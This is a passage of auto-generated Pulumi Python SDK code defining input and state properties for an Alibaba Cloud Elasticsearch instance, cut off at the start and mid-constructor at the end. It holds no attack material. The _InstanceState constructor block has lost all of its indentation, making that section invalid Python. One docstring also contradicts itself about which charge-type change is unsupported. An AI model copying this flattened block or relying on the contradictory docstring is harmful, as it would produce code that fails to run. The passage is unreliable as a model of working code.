    def client_node_amount(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "client_node_amount", value)

    @property
    @pulumi.getter(name="clientNodeSpec")
    def client_node_spec(self) -> Optional[pulumi.Input[str]]:
        """
        The client node spec. If specified, client node will be created.
        """
        return pulumi.get(self, "client_node_spec")

    @client_node_spec.setter
    def client_node_spec(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_node_spec", value)

    @property
    @pulumi.getter(name="dataNodeDiskEncrypted")
    def data_node_disk_encrypted(self) -> Optional[pulumi.Input[bool]]:
        """
        If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
        """
        return pulumi.get(self, "data_node_disk_encrypted")

    @data_node_disk_encrypted.setter
    def data_node_disk_encrypted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "data_node_disk_encrypted", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of instance. It is a string of 0 to 30 characters.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="enableKibanaPrivateNetwork")
    def enable_kibana_private_network(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool, default to false. When it is set to true, the instance can close kibana private network access.
        """
        return pulumi.get(self, "enable_kibana_private_network")

    @enable_kibana_private_network.setter
    def enable_kibana_private_network(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_kibana_private_network", value)

    @property
    @pulumi.getter(name="enableKibanaPublicNetwork")
    def enable_kibana_public_network(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool, default to true. When it is set to false, the instance can enable kibana public network access.
        """
        return pulumi.get(self, "enable_kibana_public_network")

    @enable_kibana_public_network.setter
    def enable_kibana_public_network(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_kibana_public_network", value)

    @property
    @pulumi.getter(name="enablePublic")
    def enable_public(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool, default to false. When it is set to true, the instance can enable public network access.
        """
        return pulumi.get(self, "enable_public")

    @enable_public.setter
    def enable_public(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_public", value)

    @property
    @pulumi.getter(name="instanceChargeType")
    def instance_charge_type(self) -> Optional[pulumi.Input[str]]:
        """
        Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_type from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
        """
        return pulumi.get(self, "instance_charge_type")

    @instance_charge_type.setter
    def instance_charge_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_charge_type", value)

    @property
    @pulumi.getter(name="kibanaPrivateWhitelists")
    def kibana_private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the Kibana's IP whitelist in private network.
        """
        return pulumi.get(self, "kibana_private_whitelists")

    @kibana_private_whitelists.setter
    def kibana_private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "kibana_private_whitelists", value)

    @property
    @pulumi.getter(name="kibanaWhitelists")
    def kibana_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the Kibana's IP whitelist in internet network.
        """
        return pulumi.get(self, "kibana_whitelists")

    @kibana_whitelists.setter
    def kibana_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "kibana_whitelists", value)

    @property
    @pulumi.getter(name="kmsEncryptedPassword")
    def kms_encrypted_password(self) -> Optional[pulumi.Input[str]]:
        """
        A KMS-encrypted password used for an instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
        """
        return pulumi.get(self, "kms_encrypted_password")

    @kms_encrypted_password.setter
    def kms_encrypted_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_encrypted_password", value)

    @property
    @pulumi.getter(name="kmsEncryptionContext")
    def kms_encryption_context(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        A KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
        """
        return pulumi.get(self, "kms_encryption_context")

    @kms_encryption_context.setter
    def kms_encryption_context(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "kms_encryption_context", value)

    @property
    @pulumi.getter(name="masterNodeSpec")
    def master_node_spec(self) -> Optional[pulumi.Input[str]]:
        """
        The dedicated master node spec. If specified, dedicated master node will be created.
        """
        return pulumi.get(self, "master_node_spec")

    @master_node_spec.setter
    def master_node_spec(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "master_node_spec", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """
        The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
        """
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter(name="privateWhitelists")
    def private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the instance's IP whitelist in VPC network.
        """
        return pulumi.get(self, "private_whitelists")

    @private_whitelists.setter
    def private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "private_whitelists", value)

    @property
    @pulumi.getter
    def protocol(self) -> Optional[pulumi.Input[str]]:
        """
        Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`. Default is `HTTP`.
        """
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol", value)

    @property
    @pulumi.getter(name="publicWhitelists")
    def public_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the instance's IP whitelist in internet network.
        """
        return pulumi.get(self, "public_whitelists")

    @public_whitelists.setter
    def public_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "public_whitelists", value)

    @property
    @pulumi.getter(name="resourceGroupId")
    def resource_group_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Id of resource group which the Elasticsearch instance belongs.
        """
        return pulumi.get(self, "resource_group_id")

    @resource_group_id.setter
    def resource_group_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_id", value)

    @property
    @pulumi.getter(name="settingConfig")
    def setting_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
        """
        return pulumi.get(self, "setting_config")

    @setting_config.setter
    def setting_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "setting_config", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        A mapping of tags to assign to the resource.
        - key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
        - value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="zoneCount")
    def zone_count(self) -> Optional[pulumi.Input[int]]:
        """
        The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
        """
        return pulumi.get(self, "zone_count")

    @zone_count.setter
    def zone_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "zone_count", value)
@pulumi.input_type
class _InstanceState:
def __init__(__self__, *,
client_node_amount: Optional[pulumi.Input[int]] = None,
client_node_spec: Optional[pulumi.Input[str]] = None,
data_node_amount: Optional[pulumi.Input[int]] = None,
data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
data_node_disk_size: Optional[pulumi.Input[int]] = None,
data_node_disk_type: Optional[pulumi.Input[str]] = None,
data_node_spec: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
enable_public: Optional[pulumi.Input[bool]] = None,
instance_charge_type: Optional[pulumi.Input[str]] = None,
kibana_domain: Optional[pulumi.Input[str]] = None,
kibana_port: Optional[pulumi.Input[int]] = None,
kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kms_encrypted_password: Optional[pulumi.Input[str]] = None,
kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
master_node_spec: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
version: Optional[pulumi.Input[str]] = None,
vswitch_id: Optional[pulumi.Input[str]] = None,
zone_count: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Instance resources.
:param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
:param pulumi.Input[str] client_node_spec: The client node spec. If specified, client node will be created.
:param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
:param pulumi.Input[bool] data_node_disk_encrypted: If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
:param pulumi.Input[int] data_node_disk_size: The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
:param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
:param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
:param pulumi.Input[str] description: The description of instance. It a string of 0 to 30 characters.
:param pulumi.Input[str] domain: Instance connection domain (only VPC network access supported).
:param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it set to true, the instance can close kibana private network access。
:param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it set to false, the instance can enable kibana public network access。
:param pulumi.Input[bool] enable_public: Bool, default to false. When it set to true, the instance can enable public network access。
:param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
:param pulumi.Input[str] kibana_domain: Kibana console domain (Internet access supported).
:param pulumi.Input[int] kibana_port: Kibana console port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
:param pulumi.Input[str] kms_encrypted_password: An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
:param pulumi.Input[Mapping[str, Any]] kms_encryption_context: An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
:param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, dedicated master node will be created.
:param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
:param pulumi.Input[int] period: The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
:param pulumi.Input[int] port: Instance connection port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
:param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
:param pulumi.Input[str] resource_group_id: The Id of resource group which the Elasticsearch instance belongs.
:param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
:param pulumi.Input[str] status: The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
:param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
:param pulumi.Input[str] vswitch_id: The ID of VSwitch.
:param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
if client_node_amount is not None:
pulumi.set(__self__, "client_node_amount", client_node_amount)
if client_node_spec is not None:
pulumi.set(__self__, "client_node_spec", client_node_spec)
if data_node_amount is not None:
pulumi.set(__self__, "data_node_amount", data_node_amount)
if data_node_disk_encrypted is not None:
pulumi.set(__self__, "data_node_disk_encrypted", data_node_disk_encrypted)
if data_node_disk_size is not None:
pulumi.set(__self__, "data_node_disk_size", data_node_disk_size)
if data_node_disk_type is not None:
pulumi.set(__self__, "data_node_disk_type", data_node_disk_type)
if data_node_spec is not None:
pulumi.set(__self__, "data_node_spec", data_node_spec)
if description is not None:
pulumi.set(__self__, "description", description)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if enable_kibana_private_network is not None:
pulumi.set(__self__, "enable_kibana_private_network", enable_kibana_private_network)
if enable_kibana_public_network is not None:
pulumi.set(__self__, "enable_kibana_public_network", enable_kibana_public_network)
if enable_public is not None:
pulumi.set(__self__, "enable_public", enable_public)
if instance_charge_type is not None:
pulumi.set(__self__, "instance_charge_type", instance_charge_type)
if kibana_domain is not None:
pulumi.set(__self__, "kibana_domain", kibana_domain)
if kibana_port is not None:
pulumi.set(__self__, "kibana_port", kibana_port)
if kibana_private_whitelists is not None:
pulumi.set(__self__, "kibana_private_whitelists", kibana_private_whitelists)
if kibana_whitelists is not None:
pulumi.set(__self__, "kibana_whitelists", kibana_whitelists)
if kms_encrypted_password is not None:
pulumi.set(__self__, "kms_encrypted_password", kms_encrypted_password)
if kms_encryption_context is not None:
pulumi.set(__self__, "kms_encryption_context", kms_encryption_context)
if master_node_spec is not None:
pulumi.set(__self__, "master_node_spec", master_node_spec)
if password is not None:
pulumi.set(__self__, "password", password)
if period is not None:
pulumi.set(__self__, "period", period)
if port is not None:
pulumi.set(__self__, "port", port)
if private_whitelists is not None:
pulumi.set(__self__, "private_whitelists", private_whitelists)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if public_whitelists is not None:
pulumi.set(__self__, "public_whitelists", public_whitelists)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if setting_config is not None:
pulumi.set(__self__, "setting_config", setting_config)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
if vswitch_id is not None:
pulumi.set(__self__, "vswitch_id", vswitch_id)
if zone_count is not None:
pulumi.set(__self__, "zone_count", zone_count)
    @property
    @pulumi.getter(name="clientNodeAmount")
    def client_node_amount(self) -> Optional[pulumi.Input[int]]:
        """
        The Elasticsearch cluster's client node quantity, between 2 and 25.
        """
        return pulumi.get(self, "client_node_amount")

    @client_node_amount.setter
    def client_node_amount(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "client_node_amount", value)

    @property
    @pulumi.getter(name="clientNodeSpec")
    def client_node_spec(self) -> Optional[pulumi.Input[str]]:
        """
        The client node spec. If specified, a client node will be created.
        """
        return pulumi.get(self, "client_node_spec")

    @client_node_spec.setter
    def client_node_spec(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_node_spec", value)

    @property
    @pulumi.getter(name="dataNodeAmount")
    def data_node_amount(self) -> Optional[pulumi.Input[int]]:
        """
        The Elasticsearch cluster's data node quantity, between 2 and 50.
        """
        return pulumi.get(self, "data_node_amount")

    @data_node_amount.setter
    def data_node_amount(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "data_node_amount", value)

    @property
    @pulumi.getter(name="dataNodeDiskEncrypted")
    def data_node_disk_encrypted(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
        """
        return pulumi.get(self, "data_node_disk_encrypted")

    @data_node_disk_encrypted.setter
    def data_node_disk_encrypted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "data_node_disk_encrypted", value)

    @property
    @pulumi.getter(name="dataNodeDiskSize")
    def data_node_disk_size(self) -> Optional[pulumi.Input[int]]:
        """
        The single data node storage space.
        - `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
        """
        return pulumi.get(self, "data_node_disk_size")

    @data_node_disk_size.setter
    def data_node_disk_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "data_node_disk_size", value)

    @property
    @pulumi.getter(name="dataNodeDiskType")
    def data_node_disk_type(self) -> Optional[pulumi.Input[str]]:
        """
        The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
        """
        return pulumi.get(self, "data_node_disk_type")

    @data_node_disk_type.setter
    def data_node_disk_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data_node_disk_type", value)

    @property
    @pulumi.getter(name="dataNodeSpec")
    def data_node_spec(self) -> Optional[pulumi.Input[str]]:
        """
        The data node specifications of the Elasticsearch instance.
        """
        return pulumi.get(self, "data_node_spec")

    @data_node_spec.setter
    def data_node_spec(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data_node_spec", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the instance. It is a string of 0 to 30 characters.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter
    def domain(self) -> Optional[pulumi.Input[str]]:
        """
        Instance connection domain (only VPC network access supported).
        """
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain", value)

    @property
    @pulumi.getter(name="enableKibanaPrivateNetwork")
    def enable_kibana_private_network(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool, default to false. When it is set to true, the instance can close Kibana private network access.
        """
        return pulumi.get(self, "enable_kibana_private_network")

    @enable_kibana_private_network.setter
    def enable_kibana_private_network(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_kibana_private_network", value)

    @property
    @pulumi.getter(name="enableKibanaPublicNetwork")
    def enable_kibana_public_network(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool, default to true. When it is set to false, the instance can enable Kibana public network access.
        """
        return pulumi.get(self, "enable_kibana_public_network")

    @enable_kibana_public_network.setter
    def enable_kibana_public_network(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_kibana_public_network", value)

    @property
    @pulumi.getter(name="enablePublic")
    def enable_public(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool, default to false. When it is set to true, the instance can enable public network access.
        """
        return pulumi.get(self, "enable_public")

    @enable_public.setter
    def enable_public(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_public", value)

    @property
    @pulumi.getter(name="instanceChargeType")
    def instance_charge_type(self) -> Optional[pulumi.Input[str]]:
        """
        Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_type from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PrePaid` to `PostPaid` is not supported.
        """
        return pulumi.get(self, "instance_charge_type")

    @instance_charge_type.setter
    def instance_charge_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_charge_type", value)

    @property
    @pulumi.getter(name="kibanaDomain")
    def kibana_domain(self) -> Optional[pulumi.Input[str]]:
        """
        Kibana console domain (Internet access supported).
        """
        return pulumi.get(self, "kibana_domain")

    @kibana_domain.setter
    def kibana_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kibana_domain", value)

    @property
    @pulumi.getter(name="kibanaPort")
    def kibana_port(self) -> Optional[pulumi.Input[int]]:
        """
        Kibana console port.
        """
        return pulumi.get(self, "kibana_port")

    @kibana_port.setter
    def kibana_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "kibana_port", value)

    @property
    @pulumi.getter(name="kibanaPrivateWhitelists")
    def kibana_private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the Kibana's IP whitelist in private network.
        """
        return pulumi.get(self, "kibana_private_whitelists")

    @kibana_private_whitelists.setter
    def kibana_private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "kibana_private_whitelists", value)

    @property
    @pulumi.getter(name="kibanaWhitelists")
    def kibana_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the Kibana's IP whitelist in internet network.
        """
        return pulumi.get(self, "kibana_whitelists")

    @kibana_whitelists.setter
    def kibana_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "kibana_whitelists", value)
    @property
    @pulumi.getter(name="kmsEncryptedPassword")
    def kms_encrypted_password(self) -> Optional[pulumi.Input[str]]:
        """
        A KMS-encrypted password used for the instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
        """
        return pulumi.get(self, "kms_encrypted_password")

    @kms_encrypted_password.setter
    def kms_encrypted_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_encrypted_password", value)

    @property
    @pulumi.getter(name="kmsEncryptionContext")
    def kms_encryption_context(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        A KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating an instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
        """
        return pulumi.get(self, "kms_encryption_context")

    @kms_encryption_context.setter
    def kms_encryption_context(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "kms_encryption_context", value)

    @property
    @pulumi.getter(name="masterNodeSpec")
    def master_node_spec(self) -> Optional[pulumi.Input[str]]:
        """
        The dedicated master node spec. If specified, a dedicated master node will be created.
        """
        return pulumi.get(self, "master_node_spec")

    @master_node_spec.setter
    def master_node_spec(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "master_node_spec", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """
        The duration that you will buy the Elasticsearch instance (in months). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when this value is modified, the resource can renew a `PrePaid` instance.
        """
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        Instance connection port.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="privateWhitelists")
    def private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the instance's IP whitelist in VPC network.
        """
        return pulumi.get(self, "private_whitelists")

    @private_whitelists.setter
    def private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "private_whitelists", value)

    @property
    @pulumi.getter
    def protocol(self) -> Optional[pulumi.Input[str]]:
        """
        Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`. Default is `HTTP`.
        """
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol", value)
    @property
    @pulumi.getter(name="publicWhitelists")
    def public_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set the instance's IP whitelist in internet network.
        """
        return pulumi.get(self, "public_whitelists")

    @public_whitelists.setter
    def public_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "public_whitelists", value)

    @property
    @pulumi.getter(name="resourceGroupId")
    def resource_group_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the resource group to which the Elasticsearch instance belongs.
        """
        return pulumi.get(self, "resource_group_id")

    @resource_group_id.setter
    def resource_group_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_id", value)

    @property
    @pulumi.getter(name="settingConfig")
    def setting_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        The YML configuration of the instance. [Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
        """
        return pulumi.get(self, "setting_config")

    @setting_config.setter
    def setting_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "setting_config", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        A mapping of tags to assign to the resource.
        - key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
        - value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)

    @property
    @pulumi.getter(name="vswitchId")
    def vswitch_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of VSwitch.
        """
        return pulumi.get(self, "vswitch_id")

    @vswitch_id.setter
    def vswitch_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vswitch_id", value)

    @property
    @pulumi.getter(name="zoneCount")
    def zone_count(self) -> Optional[pulumi.Input[int]]:
        """
        The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
        """
        return pulumi.get(self, "zone_count")

    @zone_count.setter
    def zone_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "zone_count", value)
class Instance(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 client_node_amount: Optional[pulumi.Input[int]] = None,
                 client_node_spec: Optional[pulumi.Input[str]] = None,
                 data_node_amount: Optional[pulumi.Input[int]] = None,
                 data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
                 data_node_disk_size: Optional[pulumi.Input[int]] = None,
                 data_node_disk_type: Optional[pulumi.Input[str]] = None,
                 data_node_spec: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
